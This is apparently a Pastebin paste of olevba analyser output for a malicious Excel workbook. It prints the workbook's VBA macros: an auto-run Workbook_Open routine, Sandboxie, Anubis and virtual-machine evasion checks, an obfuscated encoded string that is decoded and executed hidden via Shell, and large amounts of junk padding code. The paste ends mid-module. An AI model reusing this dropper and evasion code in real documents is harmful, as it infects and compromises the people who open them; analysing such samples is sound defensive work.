Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- LSDB.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: LSDB.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ÝòàÊíèãà.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Workbook_Open()
- jhVKdsfjsd
- Dim siNQQVbL As Integer
- For siNQQVbL = 0 To 0
- If siNQQVbL = 5 Then End
- Next siNQQVbL
- Dim gJLryR As Integer
- For gJLryR = 0 To 0
- If gJLryR = 5 Then End
- Next gJLryR
- Dim wVKHBTQ As Integer
- For wVKHBTQ = 0 To 0
- If wVKHBTQ = 5 Then End
- Next wVKHBTQ
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+---------------+----------------------------------------+
- | Type | Keyword | Description |
- +----------+---------------+----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- +----------+---------------+----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò1.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò2.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò3.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function nxNZiOiHENlXPUXVbjKuvaMDRZpscgBqooOqJ()
- Dim vowYxIwMEb As Integer
- vowYxIwMEb = 8:
- Do While vowYxIwMEb < 30
- DoEvents: vowYxIwMEb = vowYxIwMEb + 1
- Loop
- If "dJaAtNalSZ" = "QyrtgazWfE" Then End
- If "AmpntVcNOs" = "xVjrBLurmC" Then End
- End Function
- Private Function wwWyRnRgNmuWxtGnKCTUesVCHrYSLyKjXOwpr()
- If "nMxiuRPuDk" = "vPUfDSsJTW" Then End
- If "ukPPoRcGjy" = "FeNoQMyGCu" Then End
- GoTo mwLNUsKqdd
- mwLNUsKqdd:
- End Function
- Private Sub HLrfpFRANaGDMdPHMPNTbJmnSEbQRhkUYsigg()
- GoTo rAnNVQrNAd
- rAnNVQrNAd:
- GoTo tnYTovaSSl
- tnYTovaSSl:
- Dim ZdjYhXjSys As Long
- ZdjYhXjSys = "2076":
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class2.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function jXOwprFSxuEcnYkHFkTBlFKvTIJyJMQkaFfeH()
- GoTo XdDLNoKwea
- XdDLNoKwea:
- Dim jLVjlsRIPb As Integer
- jLVjlsRIPb = 7:
- Do While jLVjlsRIPb < 16
- DoEvents: jLVjlsRIPb = jLVjlsRIPb + 1
- Loop
- Dim AOYnziviOL As Integer
- AOYnziviOL = 0:
- Do While AOYnziviOL < 11
- DoEvents: AOYnziviOL = AOYnziviOL + 1
- Loop
- GoTo PuxvbKRVva
- PuxvbKRVva:
- If "zpTcgBRoPO" = "qJmQylltop" Then End
- Dim mCBSMwrNUZ As Integer
- mCBSMwrNUZ = 8:
- Do While mCBSMwrNUZ < 26
- DoEvents: mCBSMwrNUZ = mCBSMwrNUZ + 1
- Loop
- GoTo KxCIWGvhqw
- KxCIWGvhqw:
- GoTo mvUfxcfdjS
- mvUfxcfdjS:
- Dim DEiuLQYBko As Integer
- DEiuLQYBko = 4:
- Do While DEiuLQYBko < 12
- DoEvents: DEiuLQYBko = DEiuLQYBko + 1
- Loop
- End Function
- Public Sub ooOqJfJYlemOplxmCtrMWrNtyQQKDqCIPGohj()
- GoTo uEcnyLOMrt
- uEcnyLOMrt:
- Dim lMRWTIQZJT As Long
- lMRWTIQZJT = "4654":
- Dim FfeHzWnvVD As Long
- FfeHzWnvVD = "146":
- If "CoWskbcNBd" = "kpAgatHsrf" Then End
- If "FYANaGDMkW" = "HTPNTbJtnS" Then End
- Dim QRhrUYTJnn As Long
- QRhrUYTJnn = "8655":
- If "EIXdDLNoKw" = "easjLVjlsR" Then End
- If "PbbptAOYnz" = "iviOLUMXPu" Then End
- GoTo bKRVvamjyz
- bKRVvamjyz:
- End Sub
- Private Sub hkUYsiggGIBEIQdDLGhdpetsjEOJelqIIbCPt()
- Dim vhqwqpmvUf As Integer
- vhqwqpmvUf = 9:
- Do While vhqwqpmvUf < 14
- DoEvents: vhqwqpmvUf = vhqwqpmvUf + 1
- Loop
- GoTo jSsDEiuLQY
- jSsDEiuLQY:
- Dim ojZXXwZrOr As Long
- ojZXXwZrOr = "4269":
- GoTo uwYUgVKCAu
- uwYUgVKCAu:
- Dim AVChyySlZK As Integer
- AVChyySlZK = 6:
- Do While AVChyySlZK < 28
- DoEvents: AVChyySlZK = AVChyySlZK + 1
- Loop
- Dim XQSFZxuEcn As Integer
- XQSFZxuEcn = 10:
- Do While XQSFZxuEcn < 30
- DoEvents: XQSFZxuEcn = XQSFZxuEcn + 1
- Loop
- Dim MrtalMRWTI As Integer
- MrtalMRWTI = 7:
- Do While MrtalMRWTI < 3
- DoEvents: MrtalMRWTI = MrtalMRWTI + 1
- Loop
- GoTo TQkaFfeHzW
- TQkaFfeHzW:
- Dim vVDFGCoWsk As Long
- vVDFGCoWsk = "5896":
- End Sub
- Private Sub UesVCHrYSLyKjXOwprFSxuEcnYkHFkTBlFKvT()
- Dim UYTJnnmPBE As Integer
- UYTJnnmPBE = 3:
- Do While UYTJnnmPBE < 2
- DoEvents: UYTJnnmPBE = UYTJnnmPBE + 1
- Loop
- Dim DLNoKweasj As Integer
- DLNoKweasj = 10:
- Do While DLNoKweasj < 6
- DoEvents: DLNoKweasj = DLNoKweasj + 1
- Loop
- GoTo sRIPbbptAO
- sRIPbbptAO:
- Dim nziviOLUMX As Integer
- nziviOLUMX = 8:
- Do While nziviOLUMX < 27
- DoEvents: nziviOLUMX = nziviOLUMX + 1
- Loop
- GoTo vbKRVvamjy
- vbKRVvamjy:
- Dim pTcgBRoPOq As Integer
- pTcgBRoPOq = 8:
- Do While pTcgBRoPOq < 15
- DoEvents: pTcgBRoPOq = pTcgBRoPOq + 1
- Loop
- Dim ylltoplYmC As Integer
- ylltoplYmC = 6:
- Do While ylltoplYmC < 11
- DoEvents: ylltoplYmC = ylltoplYmC + 1
- Loop
- GoTo wrNUZqqKKx
- wrNUZqqKKx:
- GoTo IWGvhqwqpm
- IWGvhqwqpm:
- End Sub
- Private Sub NlXPUXVbjKuvaMDRZpscgBqooOqJfJYlemOpl()
- GoTo CAueAVChyy
- CAueAVChyy:
- GoTo KqxOXQSFZx
- KqxOXQSFZx:
- Dim EcnyLOMrta As Long
- EcnyLOMrta = "272":
- Dim RWTIQZJTQk As Integer
- RWTIQZJTQk = 5:
- Do While RWTIQZJTQk < 19
- DoEvents: RWTIQZJTQk = RWTIQZJTQk + 1
- Loop
- Dim zWnvVDFGCo As Long
- zWnvVDFGCo = "5900":
- Dim kbcNBdkpAg As Long
- kbcNBdkpAg = "1401":
- If "HsrfwFYANa" = "GDMkWHTPNT" Then End
- If "JtnSEbQRhr" = "UYTJnnmPBE" Then End
- GoTo sjLVjlsRIP
- sjLVjlsRIP:
- End Sub
- Private Function TTHLrfpFRANaGDMdPHMPNTbJmnSEbQRhkUYsi()
- Dim lYmCBSMwrN As Long
- lYmCBSMwrN = "4520":
- Dim qqKKxCIWGv As Long
- qqKKxCIWGv = "2028":
- If "wqpmvUfxcf" = "djSsDEiuLQ" Then End
- Dim BkojZXXwZr As Long
- BkojZXXwZr = "3274":
- Dim muwYUgVKCA As Integer
- muwYUgVKCA = 2:
- Do While muwYUgVKCA < 9
- DoEvents: muwYUgVKCA = muwYUgVKCA + 1
- Loop
- Dim VChyySlZKq As Integer
- VChyySlZKq = 6:
- Do While VChyySlZKq < 16
- DoEvents: VChyySlZKq = VChyySlZKq + 1
- Loop
- GoTo QSFZxuEcny
- QSFZxuEcny:
- If "rtalMRWTIQ" = "ZJTQkaFfeH" Then End
- Dim nvVDFGCoWs As Long
- nvVDFGCoWs = "8149":
- End Function
- Private Function TUesVCHrYSLyKjXOwprFSxuEcnYkHFkTBlFKv()
- If "hrUYTJnnmP" = "BEIXdDLNoK" Then End
- GoTo IPbbptAOYn
- IPbbptAOYn:
- Dim iOLUMXPuxv As Long
- iOLUMXPuxv = "4273":
- Dim RVvamjyzpT As Integer
- RVvamjyzpT = 8:
- Do While RVvamjyzpT < 9
- DoEvents: RVvamjyzpT = RVvamjyzpT + 1
- Loop
- If "RoPOqJmQyl" = "ltoplYmCBS" Then End
- If "rNUZqqKKxC" = "IWGvhqwqpm" Then End
- If "UfxcfdjSsD" = "EiuLQYBkoj" Then End
- If "XXwZrOrgUm" = "uwYUgVKCAu" Then End
- Dim qxOXQSFZxu As Integer
- qxOXQSFZxu = 8:
- Do While qxOXQSFZxu < 8
- DoEvents: qxOXQSFZxu = qxOXQSFZxu + 1
- Loop
- End Function
- Private Sub fQcfdjLSDEinLzhqBkhcSwwWyRnRgNmuWxtGn()
- GoTo cNBdkpAgat
- cNBdkpAgat:
- GoTo srfwFYANaG
- srfwFYANaG:
- Dim MkWHTPNTbJ As Long
- MkWHTPNTbJ = "1275":
- Dim SEbQRhrUYT As Long
- SEbQRhrUYT = "5649":
- Dim mPBEIXdDLN As Integer
- mPBEIXdDLN = 1:
- Do While mPBEIXdDLN < 9
- DoEvents: mPBEIXdDLN = mPBEIXdDLN + 1
- Loop
- If "easjLVjlsR" = "IPbbptAOYn" Then End
- Dim JmQylltopl As Long
- JmQylltopl = "895":
- Dim BSMwrNUZqq As Long
- BSMwrNUZqq = "9270":
- If "xCIWGvhqwq" = "pmvUfxcfdj" Then End
- End Sub
- Private Sub jKuvaMDRZpscgBqooOqJfJYlemOplxmCtrMWr()
- GoTo yySlZKqxOX
- yySlZKqxOX:
- Dim SFZxuEcnyL As Integer
- SFZxuEcnyL = 2:
- Do While SFZxuEcnyL < 15
- DoEvents: SFZxuEcnyL = SFZxuEcnyL + 1
- Loop
- GoTo talMRWTIQZ
- talMRWTIQZ:
- Dim atHsrfwFYA As Integer
- atHsrfwFYA = 3:
- Do While atHsrfwFYA < 9
- DoEvents: atHsrfwFYA = atHsrfwFYA + 1
- Loop
- GoTo tnSEbQRhrU
- tnSEbQRhrU:
- Dim JnnmPBEIXd As Long
- JnnmPBEIXd = "7522":
- Dim NoKweasjLV As Long
- NoKweasjLV = "4528":
- Dim YnziviOLUM As Integer
- YnziviOLUM = 10:
- Do While YnziviOLUM < 1
- DoEvents: YnziviOLUM = YnziviOLUM + 1
- Loop
- Dim xvbKRVvamj As Integer
- xvbKRVvamj = 6:
- Do While xvbKRVvamj < 3
- DoEvents: xvbKRVvamj = xvbKRVvamj + 1
- Loop
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class3.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function bJmnSEbQRhkUYsiggGIBEIQdDLGhdpetsjEOJ()
- Dim qqKKxCIWGv As Long
- qqKKxCIWGv = "2028":
- If "wqpmvUfxcf" = "djSsDEiuLQ" Then End
- Dim BkojZXXwZr As Long
- BkojZXXwZr = "3274":
- Dim muwYUgVKCA As Integer
- muwYUgVKCA = 2:
- Do While muwYUgVKCA < 9
- DoEvents: muwYUgVKCA = muwYUgVKCA + 1
- Loop
- End Function
- Public Sub rNtyQQKDqCIPGohjwqPMVtfQcfdjLSDEinLzh()
- GoTo QkaFfeHzWn
- QkaFfeHzWn:
- Dim VDFGCoWskb As Long
- VDFGCoWskb = "8643":
- If "BdkpAgatHs" = "rfwFYANaGD" Then End
- Dim kWHTPNTbJt As Integer
- kWHTPNTbJt = 1:
- Do While kWHTPNTbJt < 22
- DoEvents: kWHTPNTbJt = kWHTPNTbJt + 1
- Loop
- End Sub
- Private Function vTIJyJMQkaFfeHsvZoVuDFGCovSkbcmBdKiAg()
- Dim tAOYnziviO As Integer
- tAOYnziviO = 6:
- Do While tAOYnziviO < 21
- DoEvents: tAOYnziviO = tAOYnziviO + 1
- Loop
- Dim XPuxvbKRVv As Long
- XPuxvbKRVv = "3023":
- If "jyzpTcgBRo" = "POqJmQyllt" Then End
- GoTo plYmCBSMwr
- plYmCBSMwr:
- End Function
- Private Sub elqIIbCPtznxNZiOiHENlXPUXVbjKuvaMDRZp()
- Dim jZXXwZrOrg As Integer
- jZXXwZrOrg = 4:
- Do While jZXXwZrOrg < 26
- DoEvents: jZXXwZrOrg = jZXXwZrOrg + 1
- Loop
- Dim wYUgVKCAue As Integer
- wYUgVKCAue = 3:
- Do While wYUgVKCAue < 27
- DoEvents: wYUgVKCAue = wYUgVKCAue + 1
- Loop
- If "hyySlZKqxO" = "XQSFZxuEcn" Then End
- Dim LOMrtalMRW As Integer
- LOMrtalMRW = 4:
- Do While LOMrtalMRW < 20
- DoEvents: LOMrtalMRW = LOMrtalMRW + 1
- Loop
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class4.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub uEcnYkHFkTBlFKvTIJyJMQkaFfeHsvZoVuDFG()
- Dim CuLmwLNUsK As Integer
- CuLmwLNUsK = 2:
- Do While CuLmwLNUsK < 19
- DoEvents: CuLmwLNUsK = CuLmwLNUsK + 1
- Loop
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class5.cls
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function xmCtrMWrNtyQQKDqCIPGohjwqPMVtfQcfdjLS()
- Dim xVjrBLurmC As Integer
- xVjrBLurmC = 9:
- Do While xVjrBLurmC < 24
- DoEvents: xVjrBLurmC = xVjrBLurmC + 1
- Loop
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO dfsdf.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfsdf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
- Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long
- Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long
- Const HKEY_LOCAL_MACHINE = &H80000002
- Public Function IsVirtualPCPresent() As Long
- Dim lhKey As Long
- Dim sBuffer As String
- Dim lLen As Long
- If RegOpenKeyEx(&H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", _
- 0, &H20019, lhKey) = 0 Then
- sBuffer = Space$(255): lLen = 255
- If RegQueryValueEx(lhKey, "0", 0, 1, ByVal sBuffer, lLen) = 0 Then
- sBuffer = UCase(Left$(sBuffer, lLen - 1))
- Select Case True
- Case sBuffer Like "*VIRTUAL*": IsVirtualPCPresent = 1
- Case sBuffer Like "*VMWARE*": IsVirtualPCPresent = 2
- Case sBuffer Like "*VBOX*": IsVirtualPCPresent = 3
- If IsVirtualPCPresent = 1 Or 2 Or 3 Then End
- End Select
- End If
- Call RegCloseKey(lhKey)
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO load.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/load'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub jhVKdsfjsd()
- If IsSandBoxiePresent(1) = True Then End
- If IsAnubisPresent(1) = True Then End
- If IsVirtualPCPresent = True Then End
- oPOJidsf = MkSrpQP("Åæ´j”¹½èǯ×Á×Çå¼xÊæÔ‚¡ž¯Ü›¾ÄãµÙŽÂÛìįҜ½Çí~¡ÊвÎ⵸ٗ¦èǸÑÝÐÆ¿¹¶Ê––ÊíĺŸž“²ƒx—¤”ª‡x˜§žÃì´ÀÝÕÉáÃxÕÖ߉¥wo¹³¼²ž¬®ØÔâÆ¿–ÛœÒÃÛws ŽÔÚ鱸Ɏ”¶¾šŠÊÓÕßî«´µØ§³«ÇŽ”¶¾šŠÊÓÕßî«´µØ§µÂÊ©Õí±¼ÙŽ”¶¾šŠÊÓÕßî«´µØ§µÂÊ©", "byPJenom")
- Dim wfSoeUjt As Integer
- For wfSoeUjt = 0 To 0
- If wfSoeUjt = 5 Then End
- Next wfSoeUjt
- Dim tNhbQ As Integer
- For tNhbQ = 0 To 0
- If tNhbQ = 5 Then End
- Next tNhbQ
- Shell oPOJidsf, 0
- Dim stahzHxdYZQ As Integer
- For stahzHxdYZQ = 0 To 0
- If stahzHxdYZQ = 5 Then End
- Next stahzHxdYZQ
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub gbwEJaatNBMSZQyrtgBZWfEpampntVcNOsxVj()
- Dim VpfKKjMeBe As Long
- VpfKKjMeBe = "4141":
- If "ojLHtBXPGh" = "rGIPuFlFyM" Then End
- Dim kBKDFSFkhR As Long
- kBKDFSFkhR = "6144":
- Dim lYUSYgnysX As Integer
- lYUSYgnysX = 9:
- Do While lYUSYgnysX < 19
- DoEvents: lYUSYgnysX = lYUSYgnysX + 1
- Loop
- If "WMWZDxnSsr" = "UfJmCiIQST" Then End
- GoTo bJfxopAOqx
- bJfxopAOqx:
- End Sub
- Public Sub sKqddRVCpzPbKXkQNWnyqWZXDlTwxcOlabrue()
- If "ttTvORVDqQ" = "YTuqDrgfwR" Then End
- If "wryEVVoocg" = "NBLamvbvUR" Then End
- Dim ZKChkioXxI As Long
- ZKChkioXxI = "7641":
- If "zQemcGptOE" = "bCBdWsWlyr" Then End
- Dim bcyLlHFZje As Long
- bcyLlHFZje = "1896":
- Dim MddXQdPVcT As Long
- MddXQdPVcT = "6018":
- End Sub
- Public Function rtgBZWfEpampntVcNOsxVjrBLurmcHHgJbxbq()
- Dim jLHtBXPGhr As Long
- jLHtBXPGhr = "2393":
- Dim PuFlFyMXwk As Long
- PuFlFyMXwk = "6265":
- GoTo DFSFkhRpal
- DFSFkhRpal:
- If "SYgnysXJGV" = "WMWZDxnSsr" Then End
- Dim JmCiIQSTPb As Long
- JmCiIQSTPb = "5772":
- If "pAOqxvNtgg" = "UyescSENAn" Then End
- End Function
- Private Function QNWnyqWZXDlTwxcOlabrueiDsqqpSLOranNVQ()
- Dim rgfwRBwryE As Integer
- rgfwRBwryE = 7:
- Do While rgfwRBwryE < 27
- DoEvents: rgfwRBwryE = rgfwRBwryE + 1
- Loop
- GoTo cgNBLamvbv
- cgNBLamvbv:
- Dim RaZKChkioX As Long
- RaZKChkioX = "7273":
- If "inzQemcGpt" = "OEbCBdWsWl" Then End
- GoTo rzbcyLlHFZ
- rzbcyLlHFZ:
- Dim eAHMddXQdP As Integer
- eAHMddXQdP = 5:
- Do While eAHMddXQdP < 29
- DoEvents: eAHMddXQdP = eAHMddXQdP + 1
- Loop
- End Function
- Public Function QyrtgBZWfEpampntVcNOsxVjrBLurmcHHgJbx()
- Dim XwkBKDFSFk As Integer
- XwkBKDFSFk = 4:
- Do While XwkBKDFSFk < 6
- DoEvents: XwkBKDFSFk = XwkBKDFSFk + 1
- Loop
- Dim alYUSYgnys As Long
- alYUSYgnys = "888":
- If "VWMWZDxnSs" = "rUfJmCiIQS" Then End
- GoTo vNtggUyesc
- vNtggUyesc:
- Dim ENAnTQZqCU As Long
- ENAnTQZqCU = "2268":
- GoTo AGoWAaFRoD
- AGoWAaFRoD:
- End Function
- Public Function brueiDsqqpSLOranNVQrnAoEDtOYTovBSSllZ()
- GoTo LamvbvURaZ
- LamvbvURaZ:
- Dim ChkioXxIin As Integer
- ChkioXxIin = 1:
- Do While ChkioXxIin < 21
- DoEvents: ChkioXxIin = ChkioXxIin + 1
- Loop
- GoTo mcGptOEbCB
- mcGptOEbCB:
- Dim WsWlyrzbcy As Integer
- WsWlyrzbcy = 1:
- Do While WsWlyrzbcy < 22
- DoEvents: WsWlyrzbcy = WsWlyrzbcy + 1
- Loop
- Dim FZjeAHMddX As Long
- FZjeAHMddX = "8268":
- If "PVcTbuwjdc" = "ziHsdpsqwY" Then End
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: LSDB.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function fGTxESCRdmSmLIRpbTYbZfnOyzeQHVdtwgkFV()
- Dim HLncVDFgCo As Long
- HLncVDFgCo = "5898":
- Dim kicNIdkpHH As Long
- kicNIdkpHH = "1398":
- If "HsyGwFYANh" = "GDMkWHTWUA" Then End
- GoTo UuZEbqYhrB
- UuZEbqYhrB:
- Dim TJnnNpIeIX As Long
- TJnnNpIeIX = "5651":
- Dim lNokXeaTjL As Integer
- lNokXeaTjL = 1:
- Do While lNokXeaTjL < 14
- DoEvents: lNokXeaTjL = lNokXeaTjL + 1
- Loop
- Dim YiPiCpaAOF As Long
- YiPiCpaAOF = "9154":
- If "iviOLuTEPb" = "xvbKrCWamK" Then End
- End Function
- Private Sub MNdNQUoeJjiLwAdsZyHJKGsaWofgqFhOmEkXX()
- If "wGvhqdRwtc" = "UfxcfEjSzd" Then End
- Dim JuSghYBkPj As Integer
- JuSghYBkPj = 8:
- Do While JuSghYBkPj < 6
- DoEvents: JuSghYBkPj = JuSghYBkPj + 1
- Loop
- If "wZrVygUtbw" = "YUgVKJAueA" Then End
- GoTo ChZySsGKqe
- ChZySsGKqe:
- Dim QZFZxuEcOf As Integer
- QZFZxuEcOf = 5:
- Do While QZFZxuEcOf < 9
- DoEvents: QZFZxuEcOf = QZFZxuEcOf + 1
- Loop
- If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
- Dim PcVDFgCoDs As Long
- PcVDFgCoDs = "8147":
- Dim cNIdkpHHat As Long
- cNIdkpHHat = "3146":
- End Sub
- Private Function GMTKslnBuTQZxjUgjhnPWHImrPEluFolgWBBa()
- GoTo IXdDlNokXe
- IXdDlNokXe:
- GoTo TjLVjlsYiP
- TjLVjlsYiP:
- GoTo CpaAOFngiv
- CpaAOFngiv:
- GoTo OLuTEPbxvb
- OLuTEPbxvb:
- If "rCWamKyzpA" = "cgbRvWVxJm" Then End
- GoTo fMltvwsFmJ
- fMltvwsFmJ:
- Dim TdrUBZqxKK As Long
- TdrUBZqxKK = "5153":
- Dim IwGvhqdRwt As Integer
- IwGvhqdRwt = 1:
- Do While IwGvhqdRwt < 26
- DoEvents: IwGvhqdRwt = IwGvhqdRwt + 1
- Loop
- End Function
- Private Sub TLQTRXfNqrWIfUVloYcwmkkKMFIMUhHPKlhti()
- GoTo eAvChZySsG
- eAvChZySsG:
- Dim qeoEQZFZxu As Long
- qeoEQZFZxu = "8022":
- GoTo OfLOMSaBlm
- OfLOMSaBlm:
- Dim DtIQGjTXrh As Long
- DtIQGjTXrh = "6529":
- GoTo eHLncVDFgC
- eHLncVDFgC:
- GoTo DskicNIdkp
- DskicNIdkp:
- Dim HatHsyGwFY As Integer
- HatHsyGwFY = 1:
- Do While HatHsyGwFY < 9
- DoEvents: HatHsyGwFY = HatHsyGwFY + 1
- Loop
- If "GDMkWHTWUA" = "bJUuZEbqYh" Then End
- End Sub
- Private Function FolgWBBaDVrVkRqyaCxKrOGXYiwZGLvcWPDOn()
- Dim giviOLuTEP As Integer
- giviOLuTEP = 3:
- Do While giviOLuTEP < 6
- DoEvents: giviOLuTEP = giviOLuTEP + 1
- Loop
- Dim bKrCWamKyz As Long
- bKrCWamKyz = "6521":
- If "cgbRvWVxJm" = "QfMltvwsFm" Then End
- Dim BSTdrUBZqx As Long
- BSTdrUBZqx = "3405":
- If "xCIwGvhqdR" = "wtcUfxcfEj" Then End
- Dim zdEJuSghYB As Integer
- zdEJuSghYB = 9:
- Do While zdEJuSghYB < 24
- DoEvents: zdEJuSghYB = zdEJuSghYB + 1
- Loop
- If "zXXwZrVygU" = "tbwYUgVKJA" Then End
- GoTo AvChZySsGK
- AvChZySsGK:
- End Function
- Public Function ESCRdmSmLIRpbTYbZfnOyzeQHVdtwgkFVssSu()
- If "PcVDFgCoDs" = "kicNIdkpHH" Then End
- If "HsyGwFYANh" = "GDMkWHTWUA" Then End
- GoTo yTJnnNpIeI
- yTJnnNpIeI:
- If "dDlNokXeaT" = "jLVjlsYiPi" Then End
- If "aAOFngiviO" = "LuTEPbxvbK" Then End
- If "CWamKyzpAc" = "gbRvWVxJmQ" Then End
- If "MltvwsFmJB" = "STdrUBZqxK" Then End
- Dim SzdEJuSghY As Integer
- SzdEJuSghY = 2:
- Do While SzdEJuSghY < 14
- DoEvents: SzdEJuSghY = SzdEJuSghY + 1
- Loop
- End Function
- Private Sub cwmkkKMFIMUhHPKlhtixwnISNipuMMfGTxESC()
- GoTo ZxuEcOfLOM
- ZxuEcOfLOM:
- If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
- Dim atHsyGwFYA As Long
- atHsyGwFYA = "2770":
- GoTo rByTJnnNpI
- rByTJnnNpI:
- Dim aTjLVjlsYi As Long
- aTjLVjlsYi = "6019":
- Dim iOLuTEPbxv As Integer
- iOLuTEPbxv = 4:
- Do While iOLuTEPbxv < 24
- DoEvents: iOLuTEPbxv = iOLuTEPbxv + 1
- Loop
- GoTo KKxCIwGvhq
- KKxCIwGvhq:
- Dim RwtcUfxcfE As Long
- RwtcUfxcfE = "5274":
- End Sub
- Private Function fNqrWIfUVloYcwmkkKMFIMUhHPKlhtixwnISN()
- Dim ZySsGKqeoE As Long
- ZySsGKqeoE = "3029":
- GoTo SaBlmRDtIQ
- SaBlmRDtIQ:
- Dim ncVDFgCoDs As Integer
- ncVDFgCoDs = 8:
- Do While ncVDFgCoDs < 13
- DoEvents: ncVDFgCoDs = ncVDFgCoDs + 1
- Loop
- Dim IdkpHHatHs As Integer
- IdkpHHatHs = 7:
- Do While IdkpHHatHs < 13
- DoEvents: IdkpHHatHs = IdkpHHatHs + 1
- Loop
- Dim FYANhGDMkW As Integer
- FYANhGDMkW = 1:
- Do While FYANhGDMkW < 15
- DoEvents: FYANhGDMkW = FYANhGDMkW + 1
- Loop
- Dim UAbJUuZEbq As Integer
